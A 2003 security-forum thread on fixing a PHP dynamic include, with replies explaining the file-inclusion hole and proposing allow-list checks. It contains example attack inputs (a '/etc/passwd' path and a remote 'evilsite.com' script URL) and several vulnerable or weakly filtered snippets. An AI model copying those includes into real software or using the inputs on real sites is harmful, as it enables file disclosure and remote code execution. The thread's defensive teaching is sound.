Security Forums


easy php question - dynamic includes?

browolf
Trusted SF Member
Joined: 19 Apr 2002
Posts: 1

Posted: Sat Apr 19, 2003 11:45 am    Post subject: easy php question - dynamic includes?

I'm trying to do dynamic includes. I've looked at the manual and googled for dynamic includes, but I'm just not finding anything helpful or anything that explains why it isn't working.

I've got a webpage:
http://127.0.0.1:96/sociare/index.php?page=whatis

and the code:
Code:
<? include($page.".php") ?>

but I get the error:

Warning: Failed opening '.php' for inclusion (include_path='.;c:\php4\pear') in d:\wwwroot\sociare\index.php on line 17


I think this means it isn't resolving $page. A non-dynamic include earlier on the page works.

I was trying to find some helpful stuff on Google on how to get stuff off the URL. Maybe I'm using the wrong search terms. I couldn't find it in the manual either.
I was kind of educated-guessing I could just do $page. I read a bit of a PHP book once.

I'm sure this should be easy enough.

cheers.
Battery Powered
Just Arrived
Joined: 10 Apr 2003
Posts: 0

Posted: Sat Apr 19, 2003 3:31 pm

Your code is about right; the only two things I can see wrong are:
your starting statement doesn't have 'php' in it, and
you haven't used ';' at the end.

e.g. it should be:
Code:
<?php include($page.".php"); ?>


The first bit, not having the 'php', can still work as far as I'm aware, but it's a good habit to get into.

(P.S. Your script isn't very secure at all; have you used any security measures anywhere else in the script?)

All the best,
B.P
ThePsyko
SF Mod
Joined: 17 Oct 2002
Posts: 16777178
Location: California

Posted: Sat Apr 19, 2003 4:03 pm

Try
Code:
<?php include( $_GET['page'] .".php" ) ?>


Either that or enable register_globals in the php.ini file... but it's better to get used to coding without it being enabled; otherwise, if you move hosts or something, you run the risk of having to redo all your code.
Battery Powered
Just Arrived
Joined: 10 Apr 2003
Posts: 0

Posted: Sat Apr 19, 2003 4:11 pm

Just to elaborate on the security side of the script:
since there is no validation being done on $page, anyone could call the script like this (assuming register_globals is on):
index.php?page=/etc/passwd

When a non-PHP file is include()'d it's displayed as HTML/text, so it won't be parsed, but even worse, include() allows including remote files. Imagine:
index.php?page=http://evilsite.com/evil_script.php

evil_script.php could be anything the malicious user wanted; all it would have to do is echo out some PHP code for your script to receive, and it would be run right out of your script.

The solution is to validate the input, e.g.:

Code:
// Allow-list of page names (without the ".php", since that is appended below)
$pages = array('whatis', 'whatisnt', 'what');

if( in_array($page, $pages) )
  {
    include($page.".php");
  }
else
  {
    die("Nice Try!!!");
  }

Or with ThePsyko's (better) way of doing it:
Code:
// Allow-list of page names (without the ".php", since that is appended below)
$pages = array('whatis', 'whatisnt', 'what');

if( in_array($_GET['page'], $pages) )
  {
    include( $_GET['page'] .".php" );
  }
else
  {
    die("Nice Try!!!");
  }



From what you've posted already it's clear that you're on a Windows box, so the /etc/passwd example wouldn't directly apply for you, but you get the gist; if you're going to upload the script to your webserver (and it's on *nix) the example should have made you shiver : ))
But without validation you're leaving any file open.

All the best,
B.P
big tom
Forum Fanatic
Joined: 28 May 2002
Posts: 16777215
Location: UK

Posted: Sat Apr 19, 2003 9:37 pm

or just
Code:
<?php
$page .= ".php";
include($page);
?>

Of course you don't want any cross-server scripting going on, so add this in...
Code:
<?php
// default page when none was given
if (!$page) { $page = "start";}
// refuse anything that looks like a remote URL
$pattern = "http://.+";
if (eregi($pattern, $page)) {
$page = "start";
}
$page .= ".php";
include($page);
?>

browolf
Trusted SF Member
Joined: 19 Apr 2002
Posts: 1

Posted: Sun Apr 20, 2003 4:03 pm

Still not working.
I simplified to
Code:
$page.=".php";
echo "page: ". $page;

and I get page: .php

using
Code:
<?php include( $_GET['page'] .".php" ) ?>

I get a strange error msg about T_INCLUDE.

I was looking for my php.ini.
I don't seem to have one on my c: drive. Dunno how that happened.
Could this be the reason?
Can PHP work without a php.ini?
big tom
Forum Fanatic
Joined: 28 May 2002
Posts: 16777215
Location: UK

Posted: Sun Apr 20, 2003 4:11 pm

try just
Code:
$page .= ".php";
echo "page: $page";

Personally I don't see any need to use the dot to add the variable on the end.
browolf
Trusted SF Member
Joined: 19 Apr 2002
Posts: 1

Posted: Thu May 01, 2003 5:32 pm

ThePsyko wrote:
Try
Code:
<?php include( $_GET['page'] .".php" ) ?>

Either that or enable register_globals in the php.ini file... but it's better to get used to coding without it being enabled; otherwise, if you move hosts or something, you run the risk of having to redo all your code.

I got it working using this at work, once I'd figured out the 'php' in <?php was necessary. Guess I should reinstall PHP at home.

cheers
Irenaeus
Just Arrived
Joined: 15 Apr 2003
Posts: 0
Location: nottm/leeds, england

Posted: Thu May 01, 2003 5:43 pm

I used to use this; it stops people wandering off...

Code:
if($page){
  // strstr() takes the haystack first: reject any page name containing a dot
  // (blocks "../" traversal and explicit extensions)
  if(strstr($page, '.')) {
    include('./404.php');
  }elseif(!file_exists('./' . $page . '.php')) {
    include('./404.php');
  }else {
    include('./' . $page . '.php');
  }
}


Last edited by Irenaeus on Sat Jul 09, 2005 1:27 am; edited 1 time in total
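As an added example (not code from any poster in this thread), the following combines the allow-list approach from Battery Powered's post with the existence and path checks from Irenaeus's, reading the page name from $_GET instead of relying on register_globals. It assumes a pages/ directory beside index.php containing start.php, whatis.php and whatisnt.php, plus a 404.php; those file names are illustrative.

```php
<?php
// Added example, not from the thread: hardened dynamic include.
// The user-supplied string is only ever used as an array key, so
// "../etc/passwd", "http://evilsite.com/evil_script.php" and similar
// values can never reach include().

// Allow-list: URL key => file on disk (assumed layout for this example).
$pages = array(
    'start'    => 'start.php',
    'whatis'   => 'whatis.php',
    'whatisnt' => 'whatisnt.php',
);

// Directory holding the includable pages (assumed).
$pageDir = __DIR__ . '/pages';

function resolve_page(array $pages, $pageDir, $requested)
{
    // Missing or empty parameter: fall back to the start page.
    if (!is_string($requested) || $requested === '') {
        $requested = 'start';
    }
    // Anything not on the allow-list is refused outright.
    if (!array_key_exists($requested, $pages)) {
        return false;
    }
    // Defence in depth: the file must exist and resolve inside $pageDir.
    $path = realpath($pageDir . '/' . $pages[$requested]);
    $base = realpath($pageDir);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

$target = resolve_page($pages, $pageDir,
                       isset($_GET['page']) ? $_GET['page'] : null);
if ($target === false) {
    header('HTTP/1.0 404 Not Found');
    include __DIR__ . '/404.php';
} else {
    include $target;
}
```

Because the lookup goes through a fixed map rather than string concatenation, a rejected request never reveals whether an arbitrary file exists on disk.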
dyn0
Just Arrived
Joined: 21 Apr 2003
Posts: 0
Location: Leeds

Posted: Sun May 04, 2003 12:19 pm

Quote:
<?php
$page .= ".php";
include($page);
?>


The above code (as far as I'm aware) is slightly insecure because you could do www.somesite.com/somepage.php?page=/etc/passwd and such.
browolf
Trusted SF Member
Joined: 19 Apr 2002
Posts: 1

Posted: Sun May 04, 2003 6:14 pm

I'm running PHP on the Abyss webserver from http://www.aprelium.com/ so there isn't an /etc/passwd.

I noticed the other day you can also run ASP using ActiveHTML from http://www.selisoft.com/en/ahtml/ which is free for personal use. I always thought the only other ASP was ChiliASP, but Sun seems to have bought that now.